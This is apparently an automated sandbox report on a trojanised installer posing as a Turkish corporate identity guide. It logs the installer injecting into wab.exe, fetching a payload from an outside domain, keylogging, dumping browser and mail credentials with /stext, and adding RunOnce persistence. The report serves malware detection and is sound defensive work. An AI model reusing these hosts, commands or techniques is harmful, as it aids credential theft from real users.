0000000A.00000003.35571193180.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571824908.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571073665.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 
0000000A.00000003.35580330134.000000000466C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
              Source: wab.exe, 0000000A.00000003.35572407435.000000000467D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35570967770.000000000467D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
              Source: wab.exe, 0000000A.00000003.35569904739.0000000004680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=lb
              Source: wab.exe, 0000000A.00000002.35582481202.0000000004688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.offi
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeap
              Source: wab.exe, 0000000A.00000003.35571324117.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572447017.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571517195.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571582284.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580486755.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580435804.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571702365.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571135364.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572343715.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571387430.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572565404.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35569619278.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571010327.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580683985.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572627710.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35570898773.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580784486.000000000466F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571193180.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571824908.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571073665.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 
0000000A.00000003.35580330134.000000000466C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571642671.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571761891.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571888637.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572694606.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572506007.0000000004D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
              Source: wab.exe, 0000000A.00000003.35569619278.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: bhvBEC4.tmp.10.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery
              Source: bhvBEC4.tmp.10.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/css/b5dff51-e7c3b187/kernel-9c
              Source: bhvBEC4.tmp.10.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/js/b5dff51-96897e59/kernel-1e4
              Source: wab.exe, 0000000A.00000002.35582571541.0000000004D90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.g
              Source: wab.exe, 0000000A.00000003.35579175808.0000000004683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tpc.g
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
              Source: wab.exe, 0000000A.00000002.35582571541.0000000004D90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.adobe.cb
              Source: wab.exe, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/https://
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pa
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pagead/drt/ui
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=ie
              Source: wab.exe, 0000000A.00000003.35569619278.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
              Source: wab.exe, 0000000A.00000003.35569619278.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/https://
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/https://www.msn.com/de-c
              Source: bhvBEC4.tmp.10.drString found in binary or memory: https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, bhvBEC4.tmp.10.drString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
              Source: unknown DNS traffic detected: queries for: gudanidevelopment.ge
              Source: global traffic HTTP traffic detected: GET /IogvoayYhe139.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Host: gudanidevelopment.ge Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,10_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00406B9A EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_00406B9A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00406C3D EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_00406C3D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,12_2_004072B5
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe Code function: 4_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00405461

              E-Banking Fraud

              Source: Yara match File source: 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: wab.exe PID: 7060, type: MEMORYSTR
              Source: Yara match File source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: DHRI_kurumsal kimlik rehberi-2023.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040338F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00412968 appears 78 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00421A32 appears 43 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044407A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00401806 NtdllDefWindowProc_W,10_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004018C0 NtdllDefWindowProc_W,10_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004016FC NtdllDefWindowProc_A,11_2_004016FC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004017B6 NtdllDefWindowProc_A,11_2_004017B6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00402CAC NtdllDefWindowProc_A,12_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00402D66 NtdllDefWindowProc_A,12_2_00402D66
              Source: DHRI_kurumsal kimlik rehberi-2023.exe Static PE information: Resource name: RT_VERSION type: VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79
              Source: Retarded.exe.7.dr Static PE information: Resource name: RT_VERSION type: VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process Stats: CPU usage > 6%
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe Section loaded: edgegdi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edgegdi.dll
              Source: DHRI_kurumsal kimlik rehberi-2023.exe ReversingLabs: Detection: 78%
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe File read: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
              Source: DHRI_kurumsal kimlik rehberi-2023.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit graph_11-33004
              Source: unknown Process created: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugr
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcjtaqqgzarzmhukyhhkxsdkut
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\repdaaihvijewviohscmifybdhowx
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,12_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe File created: C:\Users\user\AppData\Local\Temp\nsf522F.tmp
              Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@11/19@3/3
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_00402104 CoCreateInstance,4_2_00402104
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,4_2_00404722
              Source: wab.exe, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000007.00000002.37758445453.0000000037410000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: wab.exe, 0000000A.00000003.35577161768.0000000004D91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,10_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,10_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\ourvbpld-RBN2WW
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,10_2_0040B58D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: DHRI_kurumsal kimlik rehberi-2023.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              Source: Yara match File source: 00000004.00000002.35514571711.000000000565D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.35514010061.0000000000821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: DHRI_kurumsal kimlik rehberi-2023.exe PID: 4520, type: MEMORYSTR
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D2806 push ecx; ret 7_2_374D2819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044693D push ecx; ret 10_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00451D54 push eax; ret 10_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00444355 push ecx; ret 11_2_00444365
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004446D0 push eax; ret 11_2_004446E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004446D0 push eax; ret 11_2_0044470C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044AC84 push eax; ret 11_2_0044AC91
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414060 push eax; ret 12_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414060 push eax; ret 12_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414039 push ecx; ret 12_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004164EB push 0000006Ah; retf 12_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00416553 push 0000006Ah; retf 12_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00416555 push 0000006Ah; retf 12_2_004165C4
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_6F3D1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,4_2_6F3D1B5F
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe File created: C:\Users\user\AppData\Local\Temp\nsq53F5.tmp\System.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Anfgtendes
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_004047C6
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6440 Thread sleep count: 3600 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 196 Thread sleep count: 72 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 196 Thread sleep time: -36000s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2056 Thread sleep count: 5339 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2056 Thread sleep time: -16017000s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 3600 delay: -5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3600
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 5339
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: foregroundWindowGot 1746
              Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.7 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information queried: ProcessInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00418981 memset,GetSystemInfo,10_2_00418981
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004059CC
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_004065FD FindFirstFileW,FindClose,4_2_004065FD
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exeCode function: 4_2_00402868 FindFirstFileW,4_2_00402868
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_374D10F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_374D6580 FindFirstFileExA,7_2_374D6580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe API call chain: ExitProcess graph end node graph_4-4323
